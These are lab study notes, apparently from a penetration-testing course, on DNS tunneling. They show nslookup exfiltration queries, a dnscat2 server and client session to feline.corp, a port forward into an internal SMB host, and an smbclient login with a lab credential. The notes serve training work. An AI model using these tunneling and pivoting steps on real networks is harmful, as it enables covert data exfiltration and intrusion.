x

DNS Tunneling Theory & Practice

20.3.1 - DNS tunneling fundamentals

Check DNS settings 

resolvectl status

Use nslookup to make a DNS request 

nslookup exfiltrated-data.feline.corp

nslookup -type=txt www.feline.corp

20.3.2 - DNS tunneling with DNSCat

We can use dnscat2 to exfiltrate data with DNS subdomain queries and infiltrate data with TXT (and other) records. Note that DNS tunneling generates a lot of traffic and is not stealthy.

Run DNSCat2 server (in our example on remote machine 1) 

dnscat2-server feline.corp

Then run dnscat2 client binary from the dnscat folder on the database_admin home directory. We should see a session on the target 

./dnscat feline.corp

List active windows in dnscat 

window

window -i 1

We can set up tunneling options like a local port forward 

listen 127.0.0.1:4455 172.16.2.11:445

We can then try listing SMB shares through this port forward as per the example 

smbclient -p 4455 -L //127.0.0.1 -U hr_admin --password=Welcome1234
Left-click: follow link, Right-click: select node, Scroll: zoom
x